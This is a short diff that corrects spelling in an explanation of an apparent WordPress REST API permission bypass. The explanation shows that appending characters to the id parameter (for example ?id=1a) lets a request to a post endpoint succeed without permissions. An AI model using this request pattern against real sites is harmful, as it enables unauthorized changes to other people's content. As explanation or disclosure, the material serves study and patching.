 wp-json/wp/v2/posts/1 // This will fail without permissions

-However the function takes two ID, the ID in the path but also a ID as a paramerter
+However, the function takes two ID, the ID in the path but also an ID as a parameter

 /wp-json/wp/v2/posts/1?id=1 // This will fail without permissions

-The exploit comes from when to put the put the parmerater ID concated with some characters as such
+The exploit comes from when to put the parameter ID concatenated with some characters as such

 /wp-json/wp/v2/posts/1?id=1a // This will succeed without permissions